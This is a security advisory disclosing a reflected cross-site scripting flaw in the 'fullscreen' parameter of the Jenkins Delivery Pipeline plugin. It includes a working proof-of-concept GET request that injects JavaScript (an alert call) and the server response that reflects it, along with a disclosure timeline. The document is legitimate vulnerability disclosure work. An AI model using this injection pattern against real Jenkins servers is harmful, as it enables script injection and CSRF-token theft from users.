Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin

Vendor: Jenkins Delivery Pipeline Plugin

Vendor URL:

Versions affected: 1.0.7 (up to and including)

Systems Affected: Jenkins

Author: Viktor Gazdag viktor.gazdag[at]nccgroup[dot]trust

Advisory URL / CVE Identifier:

Risk: Medium – 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) (Reflected Cross-Site Scripting)


The Delivery Pipeline Plugin is a Jenkins plugin that helps visualizing the delivery/build pipelines. A parameter of the plugin is vulnerable to reflected cross-site scripting and depending on the configuration, can allow authenticated or unauthenticated attackers to inject JavaScript code into the webpage.


The parameter called ‘fullscreen’ found in the Delivery Pipeline Plugin was found to be vulnerable.


The vulnerability allows authenticated or unauthenticated (depending on the configuration) attackers to inject JavaScript code, such as extraction and theft of the CSRF token called ‘crumb’ from the webpage.


An example URL of the view is: http://hostname:8443/view/OMITTED-pipeline/?fullscreen=true
Basic code to show a popup window can be created with the following payload:


The following GET request and response shows an example of how the vulnerability might be exploited:

GET /view/OMITTED-pipeline/?fullscreen=true,1,1,false,null,30000,0,jsplumb);alert($(‘%23test’));pipelineutils.updatePipelines(pipelineContainers,%20″pipelineerror-“,%20+%20pipelineid,%20view HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: screenResolution=1920×1080; jenkins-timestamper-offset=-3600000; jenkins-timestamper=system; jenkins-timestamper-local=false; JSESSIONID.3dad5835=node0polduo6f03521qemnwxzxsuq71517.node0; screenResolution=1920×1080
Connection: close
Upgrade-Insecure-Requests: 1

The pipelineutils.updatePipelines() function in the response contains the submitted payload and will show a popup window:

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Tue, 26 Sep 2017 16:51:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 15251
Connection: close
X-Content-Type-Options: nosniff
Expires: 0
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
X-Hudson: 1.395
X-Jenkins: 2.78
X-Jenkins-Session: e6f83b99
X-Frame-Options: sameorigin
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkMubT4QgTWD1/LNMG5xdhX7n5Gzw4NmUubl6lS21l4EWkTZt3CDn8loWsgv++j4avamvNbzV6AvKqf9SPWnSjwRFk0ndm5B8rV2wrxFiQqxx83TGiQ3m0Xj8+PYBX7Vo6WgvQ7CSm/fbVK4Pn9OsVeacQffh6bROrKjW1hXP/ycEvsjKLGkLvxyrz65qe6rP9sjvjkxxRO1Dr+hbQS2PjyOS4rlpqL0pQWHfHlnxu415G4N3Iqwqt0aFu7iYtAgwa1GMO9OKwgNqGCcq2NoOg1FmLfTNC96uD0f+y+wz6kjz6aMg0jcMm4OaC6/39QdbXSWCLzrjj6zSfdIxU+oQfwIDAQAB
X-Content-Type-Options: nosniff
X-Frame-Options: DENY


“><div class=”pipeline-loading-icon”></div></div><div style=”width: 100.0%;” id=”pipelines-1-0″ class=”left”></div><div class=”clear”></div><script type=”text/javascript”>
function pipeline0(pipelineid, viewUrl) {

                                      var pipelineContainers = [];
                                      var jsplumb = jsPlumb.getInstance();

                                      pipelineContainers.push(‘pipelines-1-‘ + pipelineid);

                                      var view = { “viewUrl” : viewUrl };

                                      var pipelineutils = new pipelineUtils();

                                      pipelineutils.updatePipelines(pipelineContainers, “pipelineerror-” + pipelineid, view, true,1,1,false,null,30000,0,jsplumb);alert($(‘#test’));pipelineutils.updatePipelines(pipelineContainers, “pipelineerror-“, pipelineid, view, 1, 1, false, null, 30000, 0, jsplumb);
                                     Q(window).resize(function () {
                                      var jsPlumbUtilityVariable;
                                      Q(document).ready(function() {
                                               if ( undefined === jsPlumbUtilityVariable ) {
                                                     jsPlumbUtilityVariable = [];
                                               var itpipeline0 = new
                                               pipeline0(‘0’, ‘view/OMITTED-pipeline/’);
                                </script></div></div></div></div><footer><div class=”container-fluid”><div class=”row”><div class=”col-md-6″ id=”footer”></div><div class=”col-md-18″><span class=”page_generated”>Page generated: Sep 26, 2017 5:51:28 PM BST</span><span class=”rest_api”><a href=”api/”>REST API</a></span><span class=”jenkins_ver”><a href=””>Jenkins ver. 2.78</a></span></div></div></div></footer></body></html>


Jenkins and the plugin developers have released a new version of the plugin which should be installed:

Vendor Communication

2017-10-19 Advisory reported to Jenkins
2017-10-24 Acknowledgement of Core and Plugin developers
2017-11-16 Patch released

Thanks to

Gabor Pilsits

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cyber security.

Written by: Viktor Gazdag

Call us before you need us.

Our experts will help you.

Get in touch